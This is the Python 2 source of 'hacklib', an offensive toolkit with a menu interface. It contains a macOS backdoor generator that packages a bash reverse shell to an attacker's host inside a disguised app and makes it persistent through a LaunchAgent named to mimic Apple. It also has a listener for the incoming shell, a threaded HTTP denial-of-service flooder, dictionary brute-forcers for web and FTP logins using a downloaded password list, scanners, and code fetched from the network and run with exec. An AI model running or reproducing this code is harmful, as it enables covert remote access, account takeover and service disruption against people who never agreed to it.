hacklib.py

'''The MIT License (MIT)

Copyright (c) 2016 Leon Li (leon@apolyse.com)

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
associated documentation files (the "Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to
the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'''

import socket
import threading
import time
import urllib2
import os
from Queue import Queue
try:  # Import scapy if they have it. If they don't, they can still use hacklib
    from scapy.all import *
    import logging
    logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  # Fixes scapy logging error
except:
    pass
from string import ascii_uppercase, ascii_lowercase, digits  # Import for PatternCreate and PatternOffset


class Backdoor(object):
    '''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX.
        Payloads for Windows and Linux coming soon.'''

    def __init__(self):
        self.IP = ''
        self.port = ''
        self.osx_payload = '''#!/bin/bash
mkdir ~/Library/.h
echo '#!/bin/bash
bash -i >& /dev/tcp/HOST/PORT 0>&1
wait' > ~/Library/.h/connect.sh
chmod +x ~/Library/.h/connect.sh
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>'$HOME'/Library/.h/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apples.services.plist
chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
launchctl load ~/Library/LaunchAgents/com.apples.services.plist
exit
'''

    def create(self, IP, port, OS, appname='funny_cats'):
        '''Creates a user-level reverse shell.'''

        if OS == 'OSX':
            self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port))
            try:
                os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS')
            except:
                pass
            payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname
            with open(payload_path, 'w') as f:
                f.write(self.osx_payload)
            import subprocess
            subprocess.Popen(['chmod', '755', payload_path])
            print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app'


class Server(object):

    def __init__(self, port):
        import socket
        self.port = port
        self.address = ('', port)

    def listen(self):
        import time
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(self.address)
        sock.listen(1)
        while True:
            connection, cAddress = sock.accept()
            try:
                print 'New connection', cAddress
                while True:
                    data = connection.recv(32768)
                    if data:
                        print '\n'.join(data.split('\n')[:-1])
                        response = raw_input('bash$ ')
                        data = None
                    if response:
                        connection.sendall(response + '\n')
                        time.sleep(0.5)
            finally:
                connection.close()


class FTPAuth(object):
    '''FTP login and command handler.
    Commands:
                    login() Args: username, password
                    send() Args: message
    '''

    def __init__(self, IP, port=21):
        self.IP = IP
        self.port = port
        self.username = ''
        self.password = ''
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.settimeout(5)
        self.s.connect((self.IP, self.port))
        self.s.recv(1024)

    def _send(self, message):
        self.s.send(message)
        response = self.s.recv(32768)
        return response

    def send(self, message):
        self.s.send(message + '\r\n')
        while True:
            response = self.s.recv(32768)
            if response:
                return response

    def login(self, username, password):
        self._send('USER ' + username + '\r\n')
        response = self._send('PASS ' + password + '\r\n')
        if '230' in response:
            return
        elif '331' in response:
            return 'Password required'
        else:
            raise Exception(response)


class AuthClient(object):
    '''Universal login tool for most login pages as well as HTTP Basic Authentication.
    Commands:
                    login() Args: url, username, password
    '''

    def __init__(self):
        self.url = ''
        self.username = ''
        self.password = ''

    def _get_login_type(self):
        try:
            # Attempts to urlopen target URL without exception
            data = urllib2.urlopen(self.url)
            return 'FORM'
        except Exception, e:
            if 'error 401' in str(e).lower():
                return 'BA'
            if 'timed out' in str(e).lower():
                return 'TO'

    def _login_mechanize(self):
        try:
            import mechanize
        except:
            raise MissingPackageException('Please install the mechanize module before continuing.')
        # Sets up common input names/ids and creates instance of mechanize.Browser()
        userfields = ['user', 'username', 'usr', 'email', 'name', 'login', 'userid', 'userid-input', 'player']
        passfields = ['pass', 'password', 'passwd', 'pw', 'pwd']
        br = mechanize.Browser()
        br.set_handle_robots(False)
        br.set_handle_refresh(False)
        br.addheaders = [('User-agent', 'googlebot')]
        # Opens URL and lists controls
        response = br.open(self.url)
        loginurl = response.geturl()
        br.form = list(br.forms())[0]
        username_control = ''
        password_control = ''
        # Locates username and password input, and submits login info
        for control in br.form.controls:
            if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields:
                username_control = control
            if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
                password_control = control
        username_control.value = self.username
        try:
            password_control.value = self.password
        except:
            # Detected a username input but not a password input.
            # Submits form with username and attempts to detect password input in resulting page
            response = br.submit()
            br.form = list(br.forms())[0]
            for control in br.form.controls:
                if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
                    password_control = control
        password_control.value = self.password
        response = br.submit()
        # Returns response if the URL is changed. Assumes login failure if URL is the same
        if response.geturl() != loginurl:
            return response.read()
        else:
            raise Exception('Login credentials incorrect.')

    def _login_BA(self):
        try:
            # Creates a PasswordMgr instance
            passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
            passmanager.add_password(None, self.url, self.username, self.password)
            # Creates an auth handling object and builds it with opener
            auth = urllib2.HTTPBasicAuthHandler(passmanager)
            opener = urllib2.build_opener(auth)
            response = opener.open(self.url, timeout=8)
            data = response.read()
            response.close()
            return data
        except Exception, e:
            if 'Error 401' in str(e):
                raise Exception('Login credentials incorrect.')

    def login(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password
        # ascertain the type of login page given by url
        logintype = self. _get_login_type()
        if logintype == 'BA':
            # attempts to login with BA method and return html
            return self._login_BA()
        if logintype == 'TO':
            raise Exception('Request timed out.')
        if logintype == 'FORM':
            return self._login_mechanize()


class DOSer(object):
    '''Hits a host with GET requests on default port 80 from multiple threads.
    Commands:
                    launch() Args: host, duration, threads(default 1), port(default 80),
                    payload(default crocodile)
    '''

    def __init__(self):
        self.target = '127.0.0.1'
        self.port = 80
        self.threads = 1
        self.payload = '?INTERIORCROCODILEALLIGATORIDRIVEACHEVROLETMOVIETHEATER'
        self.start_time = 0
        self.time_length = 1

    def _attack(self, target):
        # Sends GET requests for time_length duration
        while int(time.time()) < self.start_time + self.time_length:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            try:
                s.connect((self.target, self.port))
                s.send("GET /" + self.payload + " HTTP/1.1\r\n")
                s.send("Host: " + self.target + "\r\n\r\n")
            except:
                pass

    def _threader(self):
        while True:
            self.worker = self.q.get()
            self._attack(self.worker)
            self.q.task_done()

    def launch(self, host, duration, threads=1, port=80, payload='default'):
        '''Launches threaded GET requests for (duration) seconds.
        '''
        self.target = host
        self.port = port
        self.threads = threads
        self.start_time = int(time.time())
        self.time_length = duration
        if payload != 'default':
            self.payload = payload
        # Creates queue to hold each thread
        self.q = Queue.Queue()
        #print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.'
        for i in range(threads):
            t = threading.Thread(target=self._threader)
            t.daemon = True
            t.start()
        # Adds workers to queue
        for worker in range(0, threads):
            self.q.put(worker)

        self.q.join()
        return


class PortScanner(object):
    '''Scan an IP address using scan(host) with default port range 1-1024.
    Commands:
                    scan() Args: IP, port_range(default 1024), timeout(default 1), verbose(default True)
    '''

    def __init__(self):
        self.IP = '127.0.0.1'
        self.port_range = '1025'
        self.print_lock = threading.Lock()
        self.timeout = 2
        self.openlist = []
        self.verbose = True

    def _portscan(self, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(self.timeout)
        # Tries to establish a connection to port, and append to list of open ports
        try:
            con = s.connect((self.IP, port))
            response = s.recv(1024)
            self.openlist.append(port)
            if self.verbose:
                with self.print_lock:
                    print 'Port', str(port) + ':'
                    print response
            s.close()
        # If the connection fails, tries to establish HTTP connection if port is a common HTTP port
        except Exception, e:
            httplist = [80, 81, 443, 1900, 2082, 2083, 8080, 8443]
            if port in httplist:
                try:
                    headers = '''GET /HTTP/1.1
Host: ''' + self.IP + '''
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate''' + '\r\n\r\n'
                    s.send(headers)
                    response = s.recv(1024)
                    response = response.splitlines()
                    response = '\n'.join(response[:7])
                    self.openlist.append(port)
                    if self.verbose:
                        with self.print_lock:
                            print 'Port', str(port) + ':'
                            print response
                    s.close()
                except:
                    pass

    def portOpen(self, port):
        if port in self.openlist:
            return
        else:
            return False

    def _threader(self):
        while True:
            self.worker = self.q.get()
            self._portscan(self.worker)
            self.q.task_done()

    def scan(self, IP, port_range=(1, 1025), timeout=1, verbose=True):
        '''Scans ports of an IP address. Use getIP() to find IP address of host.
        '''
        self.openlist = []
        self.IP = IP
        self.port_range = port_range
        self.timeout = 1
        # Creates queue to hold each thread
        self.q = Queue.Queue()
        for x in range(30):
            t = threading.Thread(target=self._threader)
            t.daemon = True
            t.start()
        # Adds workers to queue
        for worker in range(port_range[0], port_range[1]):
            self.q.put(worker)

        self.q.join()


class LanScanner(object):
    '''Scans local devices on your LAN network.
    Commands:
                    scan() Args: host_range(default (1, 255))
    '''

    def __init__(self):
        self.host_range = []
        self.alive_hosts = []
        self.localIP = ''

    def _threader(self):
        while True:
            self.worker = self.q.get()
            self._scan(self.worker)
            self.q.task_done()

    def _scan(self, host):
        import subprocess
        try:
            resp = subprocess.check_output(['ping', '-c1', '-W90', host])
            self.alive_hosts.append(host)
        except:
            return

    def getLocalIP(self):
        import subprocess
        proc = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE, shell=True)
        (out, err) = proc.communicate()
        data = out.splitlines()
        for line in data:
            if 'inet ' in line and '127.' not in line:
                return line.split(' ')[1]

    def scan(self, h_range=(1, 255)):
        # Finds local IP first in order to determine IP range of local network
        localip = self.getLocalIP()
        stub = '.'.join(localip.split('.')[:-1])
        # Adds list of possible local hosts to self.range_range
        for i in range(h_range[0], h_range[1]):
            self.host_range.append(stub + '.' + str(i))
        self.q = Queue.Queue()
        # Launches 100 threads to ping 254 potential hosts
        for x in range(100):
            t = threading.Thread(target=self._threader)
            t.daemon = True
            t.start()
        for worker in self.host_range:
            self.q.put(worker)
        self.q.join()
        return list(set(self.alive_hosts))


class _Getch:
    """Gets a single character from standard input.  Does not echo to the
    screen."""

    def __init__(self):
        try:
            self.impl = _GetchWindows()
        except ImportError:
            try:
                self.impl = _GetchUnix()
            except ImportError:
                self.impl = _GetchMacCarbon()

    def __call__(self): return self.impl()


class _GetchUnix:
    def __init__(self):
        import tty
        import sys
        import termios

    def __call__(self):
        import sys
        import tty
        import termios
        try:
            fd = sys.stdin.fileno()
            old_settings = termios.tcgetattr(fd)
            try:
                tty.setraw(sys.stdin.fileno())
                ch = sys.stdin.read(1)
            finally:
                termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
            return ch
        except:
            return raw_input('> ')


class _GetchWindows:
    def __init__(self):
        import msvcrt

    def __call__(self):
        try:
            import msvcrt
            return msvcrt.getch()
        except:
            return raw_input('> ')


class Proxy(object):
    '''Can work in conjunction with getProxies() to tunnel all
    network activity in the Python script through a Socks4/5 proxy.
    Commands:
                    connect() Args: getProxies(), timeout=10
                    connect_manual() Args: IP, port, proxy_type
    '''

    def __init__(self):
        self.IP = ''
        self.port = ''
        self.proxy_type = ''
        self.country = ''
        self._socksfile = urllib2.urlopen('https://raw.githubusercontent.com/Anorov/PySocks/master/socks.py').read()
        global socks
        # Dynamically import socks.py from the internet
        socks = importFromString(self._socksfile, 'socks')

    def connect(self, proxies, timeout=10):
        for proxy in proxies:
            if proxy[4] == 'Socks4':
                self.proxy_type = socks.PROXY_TYPE_SOCKS4
            else:
                self.proxy_type = socks.PROXY_TYPE_SOCKS5
            try:
                # Sets the socket.socket class to the socks module's socksocket class
                socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1]))
                socket.socket = socks.socksocket
                # Tests to see if the proxy can open a webpage
                currentIP = urllib2.urlopen('http://icanhazip.com/', timeout=timeout).read().split()[0]
                self.IP = proxy[0]
                self.port = int(proxy[1])
                self.country = proxy[2]
                return
            except:
                pass
        raise Exception('Couldn\'t connect to any proxies.')

    def connect_manual(IP, port, proxy_type='Socks5'):
        if proxy_type == 'Socks4':
            self.proxy_type = socks.PROXY_TYPE_SOCKS4
        else:
            self.proxy_type = socks.PROXY_TYPE_SOCKS5
        try:
            socks.setdefaultproxy(self.proxy_type, IP, port)
            socket.socket = socks.socksocket
            currentIP = urllib2.urlopen('http://icanhazip.com/').read().split()[0]
            self.IP = IP
            self.port = port
            return currentIP
        except:
            raise Exception('Connection failed.')


def importFromString(code, name):
    """Import dynamically generated code as a module.
    Args: code: a string, a file handle, or a compiled binary
    name: the name of the module
    """
    import sys
    import imp
    module = imp.new_module(name)
    exec code in module.__dict__
    return module


def getIP(host):
    return socket.gethostbyname(host)


def randomIP():
    import struct
    return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))


def getProxies(country_filter='ALL', proxy_type=('Socks4', 'Socks5')):
    '''Gets list of recently tested Socks4/5 proxies.
    Return format is as follows:
    [IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked]
    Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX')
    proxy_type: Specify whic Socks version to use, e.g. 'Socks5'
    '''
    try:
        import mechanize
    except:
        raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()')
    try:
        from bs4 import BeautifulSoup
    except:
        raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()')
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'googlebot')]
    data = br.open('http://www.socks-proxy.net').read()
    soup = BeautifulSoup(data, 'html.parser')
    proxylist = []
    table = soup.find('table')
    tbody = table.find('tbody')
    rows = tbody.find_all('tr')
    for row in rows:
        cols = row.find_all('td')
        cols = [ele.text.strip() for ele in cols]
        proxylist.append([ele for ele in cols if ele])
    filteredlist = []
    if not country_filter == 'ALL':
        for proxy in proxylist:
            if proxy[2] in country_filter:
                filteredlist.append(proxy)
        proxylist = filteredlist
        filteredlist = []
    if not proxy_type == ('Socks4', 'Socks5'):
        for proxy in proxylist:
            if not country_filter == 'ALL':
                if proxy[4] in proxy_type and proxy[2] in country_filter:
                    filteredlist.append(proxy)
            else:
                if proxy[4] in proxy_type:
                    filteredlist.append(proxy)
        proxylist = filteredlist
    return proxylist


def installDependencies():
    import subprocess
    mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize'])
    if 'successfully installed' in mech:
        print 'Installed mechanize'
    beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4'])
    if 'successfully installed' in beaut:
        print 'Installed beautifulsoup'
    scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy'])
    if 'successfully installed' in scapy:
        print 'Installed scapy'
    pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy'])
    if 'successfully installed' in pcapy:
        print 'Installed pcapy'


sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


def send(IP, port, message, keepalive=False):
    '''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock
    to handle socket and hacklib.sock.close() when finished.
    '''
    if keepalive:
        global sock
    else:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((IP, port))
    sock.send(message)
    response = sock.recv(2048)
    if not keepalive:
        sock.close()
    return response


def ping(host):
    """Pings a host and returns true if the host exists.
    """
    import os
    import platform
    ping_str = "-n 1" if platform.system().lower() == "windows" else "-c 1"
    return os.system("ping " + ping_str + " " + host) == 0


def topPasswords(amount):
    '''Get up to 100,000 most common passwords.
    '''
    url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt'
    passlist = urllib2.urlopen(url).read().split('\n')
    return passlist[:amount]


def uiPortScan(address):
    print ''
    print '1) default scan (port range 1-1024)'
    print '2) custom range'
    ink = _Getch()
    cmd = ink()
    ps = PortScanner()
    print 'Beginning port scan.'
    if cmd == '1':
        ps.scan(address)
    if cmd == '2':
        s_port = raw_input('Input starting port > ')
        e_port = raw_input('Input end port >')
        ps.scan(address, (int(s_port), int(e_port)))
    print 'Port scan complete.'


def uiDOS(address):
    dos = DOSer()
    print ''
    duration = raw_input('Duration > ')
    threads = raw_input('Threads > ')
    port = int(raw_input('Port > '))
    payload = raw_input('Payload > ')
    print 'Launching DOS attack'
    dos.launch(address, duration, threads, port, payload)


def uiTCPMessage(address):
    print ''
    port = int(raw_input('Input port >'))
    message = raw_input('Message > ')
    send(address, port, message)


def uiLogin(address):
    print ''
    print 'Select login type'
    print '1) HTTP/Form login'
    print '2) FTP login'
    print '3) Exit'
    print ''
    ink = _Getch()
    cmd = ink()
    if cmd == '1':
        ac = AuthClient()
        print '1) Dictionary attack'
        print '2) Exit'
        ink = _Getch()
        cmd = ink()
        if cmd == '1':
            username = raw_input('Username > ')
            print '1) Try most common passwords'
            print '2) Import password list (separated by newline)'
            cmd = ink()
            if cmd == '1':
                print 'Try the top <input number> out of 100,000 most common passwords:'
                num = int(raw_input('> '))
                passwords = topPasswords(num)
            if cmd == '2':
                passfile = raw_input('Filepath > ')
                with open(passfile, 'r') as f:
                    passwords = passfile.read().splitlines()
            print 'Input a unique string the webpage may respond with if login fails'
            print 'i.e. "please try again" or "login failed"'
            failstring = raw_input('> ')
            for password in passwords:
                try:
                    data = ac.login(address, username, password)
                    if failstring in data:
                        print password + ' failed'
                    elif failstring not in data:
                        print 'Login success!'
                        print 'Password is: ' + password
                        time.sleep(2)
                        return
                except:
                    print password + ' failed'
        if cmd == '2':
            return

    if cmd == '2':
        ftp = FTPAuth(address)
        print '1) Dictionary attack'
        print '2) Single login'
        print '3) Exit'
        ink = _Getch()
        cmd = ink()
        username = raw_input('Username > ')
        if cmd == '1':
            print 'Try the top <input number> out of 100,000 most common passwords:'
            num = raw_input('> ')
            for password in topPasswords(num):
                try:
                    response = ftp.send('USER ' + username + '\r\n')
                    if '331' in response:
                        response = ftp.send('PASS ' + password + '\r\n')
                        if '331' in response:
                            response = ftp.send('PASS ' + password + '\r\n')
                    if '230' in response:
                        print 'Login success!'
                        print 'Password is: ' + password
                        time.sleep(2)
                        return
                    if '530' in response:
                        print password + ' failed.'
                        ftp = FTPAuth(address)
                except:
                    print password + ' failed.'
                    ftp = FTPAuth(address)

        if cmd == '2':
            username = raw_input('Username > ')
            ftp.send('USER ' + username + '\r\n')
            password = raw_input('Password > ')
            ftp.send('PASS ' + password + '\r\n')
        if cmd == '3':
            return


def uiLanScan():
    lan = LanScanner()
    print 'Starting Lan scan'
    hosts = lan.scan()
    for ip in hosts:
        print ip
    print 'Lan scan complete.'
    time.sleep(2)


def uiCreateBackdoor():
    print ''
    print 'Select OS'
    print '1) Mac OSX'
    ink = _Getch()
    cmd = ink()
    if cmd == '1':
        ip = raw_input('Listener IP > ')
        port = raw_input('Listener Port > ')
        appname = raw_input('Filename > ')
        bd = Backdoor()
        bd.create(ip, port, 'OSX', appname)
        time.sleep(2)


def uiServer():
    print ''
    port = raw_input('Listening port > ')
    s = Server(int(port))
    print 'Listening on port ' + port
    s.listen()


def userInterface():
    '''Start UI if hacklib isn't being used as a library.
    '''
    firstrun = 0
    while True:
        if firstrun == 0:
            print '----------------------------------------------'
            print 'Hey. What can I do you for?'
            print '\n'
            firstrun += 1
        print 'Enter the number corresponding to your choice.'
        print ''
        print '1) Connect to a proxy'
        print '2) Target an IP or URL'
        print '3) Lan Scan'
        print '4) Create Backdoor'
        print '5) Server'
        print '6) Exit'
        ink = _Getch()
        cmd = ink()
        if cmd == '6':
            return
        if cmd == '2':
            address = raw_input('Input IP or URL > ')
            if '.' not in address:
                print 'Invalid IP/URL.'
                return
            print 'What would you like to do?'
            print ''
            print '1) Port scan'
            print '2) DOS'
            print '3) Send TCP message'
            print '4) Attempt login'
            print '5) Exit'
            cmd = ink()
            if cmd == '1':
                uiPortScan(getIP(address))
            if cmd == '2':
                uiDOS(getIP(address))
            if cmd == '3':
                uiTCPMessage(getIP(address))
            if cmd == '4':
                uiLogin(address)
            cmd = ''

        if cmd == '3':
            uiLanScan()

        if cmd == '4':
            uiCreateBackdoor()

        if cmd == '5':
            uiServer()

        if cmd == '1':
            print 'Would you like to automatically find a proxy or input one manually?'
            print 'Enter the number corresponding to your choice.'
            print ''
            print '1) Auto'
            print '2) Manual'
            cmd = ink()
            print 'Connecting to a SOCKS proxy.'
            proxies = getProxies()
            global proxy
            proxy = Proxy()
            if cmd == '1':
                proxy.connect(getProxies())
                print 'Your new IP address is ' + proxy.IP
                print 'This proxy is located in ' + proxy.country
                print '---------'
                time.sleep(2)
            if cmd == '2':
                pr_address = raw_input('Proxy address > ')
                pr_port = raw_input('Proxy port > ')
                pr_type = raw_input('Enter "Socks4" or "Socks5" > ')
                try:
                    proxy.connect_manual(pr_address, pr_port, pr_type)
                except:
                    print 'Connection failed.'
                    time.sleep(2)
                    pass
                print 'Proxy connected.'
                time.sleep(2)
                pass


"""

This Class Mangles Words specified by the user

Example:

Test = hacklib.Mangle("Test", 1, 10, 1996, 2016)

Test.Leet()

Output: T3st

"""


class Mangle:

    def __init__(self, text, num1, num2, year1, year2):

        self.num1 = num1
        self.num2 = num2
        self.year1 = year1
        self.year2 = year2
        self.text = text

    def Numbers(self):

        for x in self.text.split():

            for i in range(self.num1, self.num2):

                print ("%s" + "%s") % (x, i)
                print ("%s" + "%s") % (i, x)

    def Years(self):

        for x in self.text.split():

            for i in range(self.year1, self.year2):

                print ("%s" + "%s") % (x, i)
                print ("%s" + "%s") % (i, x)

    def UniqueNum(self):

        for x in self.text.split():

            for i in range(self.num1, self.num2):

                print ("%s" + "%s" + "%s") % (x, x, i)

    def UniqueYears(self):

        for x in self.text.split():

            for i in range(self.year1, self.year2):

                print ("%s" + "%s" + "%s") % (x, x, i)

    def FirstLetterCapNum(self):

        for x in self.text.split():

            for i in range(self.num1, self.num2):

                print ("%s" + "%s") % (x.capitalize(), i)
                print ("%s" + "%s") % (i, x.capitalize())

    def Caps(self):

        for x in self.text.split():

            print x.capitalize()

    def UniqueCaps(self):

        for x in self.text.split():

            print ("%s" + "s") % (x.capitalize(), x.capitalize())

    def CapandYears(self):

        for x in self.text.split():

            for i in range(self.year1, self.year2):

                print ("%s" + "%s") % (x.capitalize(), i)
                print ("%s" + "%s") % (i, x.capitalize())

    def Leet(self):

        for x in self.text.split():
            print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")

    def LeetCap(self):

        for x in self.text.split():
            print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")

    def LeetYears(self):

        for x in self.text.split():

            for i in range(self.year1, self.year2):

                print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
                print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))

    def LeetNumbers(self):

        for x in self.text.split():

            for i in range(self.num1, self.num2):

                print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
                print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))

    def UniqueLeet(self):

        for x in self.text.split():

            print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")))

    def Reverse(self):

        for x in self.text.split():

            print x[::-1]

    def ReverseCap(self):

        for x in self.text.split():
            print x[::-1].capitalize()

    def ReverseNum(self):

        for x in self.text.split():

            for i in range(self.num1, self.num2):

                print ("%s" + "%s") % (x[::-1], i)
                print ("%s" + "%s") % (i, x[::-1])

    def ReverseYears(self):

        for x in self.text.split():

            for i in range(self.year1, self.year2):

                print ("%s" + "%s") % (x[::-1], i)
                print ("%s" + "%s") % (i, x[::-1])

    def ReverseUnique(self):

        for x in self.text.split():

            print x[::-1] + x[::-1]


'''
This Classes Dectects Probe Requests from Wireless Devices.

Example:

Probe = Proberequests("wlan0")

Probe.startSniff()

'''


class Proberequests:

    global probeReqs

    probeReqs = []

    def __init__(self, interface):

        self.interface = interface

    def sniffProbe(self, p):

        if p.haslayer(Dot11ProbeReq):
            netName = p.getlayer(Dot11ProbeReq).info
            if netName not in probeReqs:
                probeReqs.append(netName)
                print '[!] Detected New Probe Request: '
                print "[+] ESSID: " + netName + " BSSID: " + p.addr2

    def startSniff(self):

        print "[+] Scanning...\n"

        sniff(iface=self.interface, prn=self.sniffProbe)


"""

This class creates a unique pattern of 20280 characters.

This is a replica of the metasploit tool called pattern_create.rb

Example:

patternTest = PatternCreate(1000)

patternTest.generate()

Creates a unique pattern of 1000 characters.

"""


class PatternCreate:

    global MAX_PATTERN_LENGTH

    MAX_PATTERN_LENGTH = 20280

    def __init__(self, length):

        self.length = length

    def generate(self):

        output = []

        """
        Generate a pattern of a given length up to a maximum
        of 20280 - after this the pattern would repeat
        """
        if self.length >= MAX_PATTERN_LENGTH:
            raise MaxLengthException('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH)

        pattern = ''
        for upper in ascii_uppercase:
            for lower in ascii_lowercase:
                for digit in digits:
                    if len(pattern) < self.length:
                        pattern += upper+lower+digit
                    else:
                        out = pattern[:self.length]

        output.append(out)

        print str(output)[1:-1].replace("'", "")


"""

This class finds the offset from the PatternCreate class.

This is a replica of the metasploit tool called pattern_offset.rb

Example:

offset = PatternOffset("Aw1A")

offset.find()

Finds offset of Aw1A.

Output: [+] Offset: 663

"""


class PatternOffset:

    def __init__(self, search_pattern):

        self.search_pattern = search_pattern

    def find(self):

        offset = []

        needle = self.search_pattern

        try:
            if needle.startswith('0x'):
                # Strip off '0x', convert to ASCII and reverse
                needle = needle[2:]
                needle = bytes.fromhex(needle).decode('ascii')
                needle = needle[::-1]
        except TypeError as e:
            print('Unable to convert hex input:', e)
            sys.exit(1)

        haystack = ''
        for upper in ascii_uppercase:
            for lower in ascii_lowercase:
                for digit in digits:
                    haystack += upper+lower+digit
                    found_at = haystack.find(needle)
                    if found_at > -1:

                        offset = found_at

        print "[+] Offset: " + str(offset)


if __name__ == '__main__':
    userInterface()


class MissingPackageException(Exception):
    '''Raise when 3rd party modules are not able to be imported.'''


class MissingPipexception(Exception):
    '''Raise when pip is not able to be found'''